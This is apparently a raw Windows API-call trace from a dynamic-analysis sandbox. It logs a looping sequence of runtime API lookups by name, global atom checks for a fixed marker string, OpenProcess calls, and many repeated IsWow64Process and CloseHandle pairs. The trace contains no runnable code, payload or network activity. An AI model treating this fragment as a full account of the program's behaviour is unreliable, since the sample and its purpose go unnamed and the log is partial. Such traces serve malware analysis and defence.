	[0137.660] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.660] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.661] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.661] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.661] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.661] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.661] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.661] CloseHandle (hObject=0x2dc) returned 1
	[0137.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.662] CloseHandle (hObject=0x2dc) returned 1
	[0137.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.662] CloseHandle (hObject=0x2dc) returned 1
	[0137.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.662] CloseHandle (hObject=0x2dc) returned 1
	[0137.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.662] CloseHandle (hObject=0x2dc) returned 1
	[0137.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.663] CloseHandle (hObject=0x2dc) returned 1
	[0137.695] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.695] CloseHandle (hObject=0x2dc) returned 1
	[0137.695] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.696] CloseHandle (hObject=0x2dc) returned 1
	[0137.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.696] CloseHandle (hObject=0x2dc) returned 1
	[0137.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.696] CloseHandle (hObject=0x2dc) returned 1
	[0137.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.696] CloseHandle (hObject=0x2dc) returned 1
	[0137.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.696] CloseHandle (hObject=0x2dc) returned 1
	[0137.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.697] CloseHandle (hObject=0x2dc) returned 1
	[0137.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.697] CloseHandle (hObject=0x2dc) returned 1
	[0137.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.697] CloseHandle (hObject=0x2dc) returned 1
	[0137.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.697] CloseHandle (hObject=0x2dc) returned 1
	[0137.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.698] CloseHandle (hObject=0x2dc) returned 1
	[0137.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.698] CloseHandle (hObject=0x2dc) returned 1
	[0137.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.698] CloseHandle (hObject=0x2dc) returned 1
	[0137.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.698] CloseHandle (hObject=0x2dc) returned 1
	[0137.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.699] CloseHandle (hObject=0x2dc) returned 1
	[0137.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.699] CloseHandle (hObject=0x2dc) returned 1
	[0137.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.699] CloseHandle (hObject=0x2dc) returned 1
	[0137.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.699] CloseHandle (hObject=0x2dc) returned 1
	[0137.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.700] CloseHandle (hObject=0x2dc) returned 1
	[0137.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.700] CloseHandle (hObject=0x2dc) returned 1
	[0137.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.700] CloseHandle (hObject=0x2dc) returned 1
	[0137.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.700] CloseHandle (hObject=0x2dc) returned 1
	[0137.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.701] CloseHandle (hObject=0x2dc) returned 1
	[0137.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.701] CloseHandle (hObject=0x2dc) returned 1
	[0137.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.701] CloseHandle (hObject=0x2dc) returned 1
	[0137.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.701] CloseHandle (hObject=0x2dc) returned 1
	[0137.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.702] CloseHandle (hObject=0x2dc) returned 1
	[0137.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.702] CloseHandle (hObject=0x2dc) returned 1
	[0137.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.702] CloseHandle (hObject=0x2dc) returned 1
	[0137.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.702] CloseHandle (hObject=0x2dc) returned 1
	[0137.703] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.703] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.703] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.703] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.704] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.704] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.704] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.704] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.704] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.704] CloseHandle (hObject=0x2dc) returned 1
	[0137.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.704] CloseHandle (hObject=0x2dc) returned 1
	[0137.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.705] CloseHandle (hObject=0x2dc) returned 1
	[0137.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.705] CloseHandle (hObject=0x2dc) returned 1
	[0137.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.705] CloseHandle (hObject=0x2dc) returned 1
	[0137.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.705] CloseHandle (hObject=0x2dc) returned 1
	[0137.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.739] CloseHandle (hObject=0x2dc) returned 1
	[0137.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.739] CloseHandle (hObject=0x2dc) returned 1
	[0137.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.740] CloseHandle (hObject=0x2dc) returned 1
	[0137.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.740] CloseHandle (hObject=0x2dc) returned 1
	[0137.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.740] CloseHandle (hObject=0x2dc) returned 1
	[0137.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.740] CloseHandle (hObject=0x2dc) returned 1
	[0137.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.740] CloseHandle (hObject=0x2dc) returned 1
	[0137.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.741] CloseHandle (hObject=0x2dc) returned 1
	[0137.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.741] CloseHandle (hObject=0x2dc) returned 1
	[0137.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.741] CloseHandle (hObject=0x2dc) returned 1
	[0137.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.741] CloseHandle (hObject=0x2dc) returned 1
	[0137.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.742] CloseHandle (hObject=0x2dc) returned 1
	[0137.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.742] CloseHandle (hObject=0x2dc) returned 1
	[0137.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.742] CloseHandle (hObject=0x2dc) returned 1
	[0137.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.742] CloseHandle (hObject=0x2dc) returned 1
	[0137.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.743] CloseHandle (hObject=0x2dc) returned 1
	[0137.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.743] CloseHandle (hObject=0x2dc) returned 1
	[0137.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.743] CloseHandle (hObject=0x2dc) returned 1
	[0137.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.743] CloseHandle (hObject=0x2dc) returned 1
	[0137.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.744] CloseHandle (hObject=0x2dc) returned 1
	[0137.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.744] CloseHandle (hObject=0x2dc) returned 1
	[0137.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.744] CloseHandle (hObject=0x2dc) returned 1
	[0137.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.744] CloseHandle (hObject=0x2dc) returned 1
	[0137.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.745] CloseHandle (hObject=0x2dc) returned 1
	[0137.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.745] CloseHandle (hObject=0x2dc) returned 1
	[0137.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.745] CloseHandle (hObject=0x2dc) returned 1
	[0137.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.745] CloseHandle (hObject=0x2dc) returned 1
	[0137.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.746] CloseHandle (hObject=0x2dc) returned 1
	[0137.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.746] CloseHandle (hObject=0x2dc) returned 1
	[0137.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.746] CloseHandle (hObject=0x2dc) returned 1
	[0137.747] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.747] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.747] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.747] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.747] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.748] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.748] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.748] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.748] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.748] CloseHandle (hObject=0x2dc) returned 1
	[0137.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.748] CloseHandle (hObject=0x2dc) returned 1
	[0137.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.749] CloseHandle (hObject=0x2dc) returned 1
	[0137.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.749] CloseHandle (hObject=0x2dc) returned 1
	[0137.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.749] CloseHandle (hObject=0x2dc) returned 1
	[0137.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.749] CloseHandle (hObject=0x2dc) returned 1
	[0137.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.782] CloseHandle (hObject=0x2dc) returned 1
	[0137.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.783] CloseHandle (hObject=0x2dc) returned 1
	[0137.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.783] CloseHandle (hObject=0x2dc) returned 1
	[0137.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.783] CloseHandle (hObject=0x2dc) returned 1
	[0137.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.784] CloseHandle (hObject=0x2dc) returned 1
	[0137.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.784] CloseHandle (hObject=0x2dc) returned 1
	[0137.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.784] CloseHandle (hObject=0x2dc) returned 1
	[0137.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.784] CloseHandle (hObject=0x2dc) returned 1
	[0137.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.785] CloseHandle (hObject=0x2dc) returned 1
	[0137.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.785] CloseHandle (hObject=0x2dc) returned 1
	[0137.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.785] CloseHandle (hObject=0x2dc) returned 1
	[0137.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.785] CloseHandle (hObject=0x2dc) returned 1
	[0137.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.786] CloseHandle (hObject=0x2dc) returned 1
	[0137.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.786] CloseHandle (hObject=0x2dc) returned 1
	[0137.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.786] CloseHandle (hObject=0x2dc) returned 1
	[0137.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.786] CloseHandle (hObject=0x2dc) returned 1
	[0137.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.787] CloseHandle (hObject=0x2dc) returned 1
	[0137.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.787] CloseHandle (hObject=0x2dc) returned 1
	[0137.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.787] CloseHandle (hObject=0x2dc) returned 1
	[0137.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.787] CloseHandle (hObject=0x2dc) returned 1
	[0137.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.788] CloseHandle (hObject=0x2dc) returned 1
	[0137.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.788] CloseHandle (hObject=0x2dc) returned 1
	[0137.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.788] CloseHandle (hObject=0x2dc) returned 1
	[0137.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.789] CloseHandle (hObject=0x2dc) returned 1
	[0137.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.789] CloseHandle (hObject=0x2dc) returned 1
	[0137.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.789] CloseHandle (hObject=0x2dc) returned 1
	[0137.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.789] CloseHandle (hObject=0x2dc) returned 1
	[0137.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.790] CloseHandle (hObject=0x2dc) returned 1
	[0137.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.790] CloseHandle (hObject=0x2dc) returned 1
	[0137.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.790] CloseHandle (hObject=0x2dc) returned 1
	[0137.791] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.791] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.791] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.791] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.792] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.792] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.792] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.792] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.792] CloseHandle (hObject=0x2dc) returned 1
	[0137.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.793] CloseHandle (hObject=0x2dc) returned 1
	[0137.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.793] CloseHandle (hObject=0x2dc) returned 1
	[0137.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.793] CloseHandle (hObject=0x2dc) returned 1
	[0137.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.793] CloseHandle (hObject=0x2dc) returned 1
	[0137.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.794] CloseHandle (hObject=0x2dc) returned 1
	[0137.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.826] CloseHandle (hObject=0x2dc) returned 1
	[0137.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.827] CloseHandle (hObject=0x2dc) returned 1
	[0137.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.827] CloseHandle (hObject=0x2dc) returned 1
	[0137.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.827] CloseHandle (hObject=0x2dc) returned 1
	[0137.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.827] CloseHandle (hObject=0x2dc) returned 1
	[0137.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.828] CloseHandle (hObject=0x2dc) returned 1
	[0137.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.828] CloseHandle (hObject=0x2dc) returned 1
	[0137.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.828] CloseHandle (hObject=0x2dc) returned 1
	[0137.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.828] CloseHandle (hObject=0x2dc) returned 1
	[0137.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.829] CloseHandle (hObject=0x2dc) returned 1
	[0137.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.829] CloseHandle (hObject=0x2dc) returned 1
	[0137.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.829] CloseHandle (hObject=0x2dc) returned 1
	[0137.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.829] CloseHandle (hObject=0x2dc) returned 1
	[0137.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.830] CloseHandle (hObject=0x2dc) returned 1
	[0137.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.830] CloseHandle (hObject=0x2dc) returned 1
	[0137.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.830] CloseHandle (hObject=0x2dc) returned 1
	[0137.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.830] CloseHandle (hObject=0x2dc) returned 1
	[0137.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.831] CloseHandle (hObject=0x2dc) returned 1
	[0137.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.831] CloseHandle (hObject=0x2dc) returned 1
	[0137.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.831] CloseHandle (hObject=0x2dc) returned 1
	[0137.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.831] CloseHandle (hObject=0x2dc) returned 1
	[0137.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.832] CloseHandle (hObject=0x2dc) returned 1
	[0137.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.832] CloseHandle (hObject=0x2dc) returned 1
	[0137.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.832] CloseHandle (hObject=0x2dc) returned 1
	[0137.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.832] CloseHandle (hObject=0x2dc) returned 1
	[0137.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.833] CloseHandle (hObject=0x2dc) returned 1
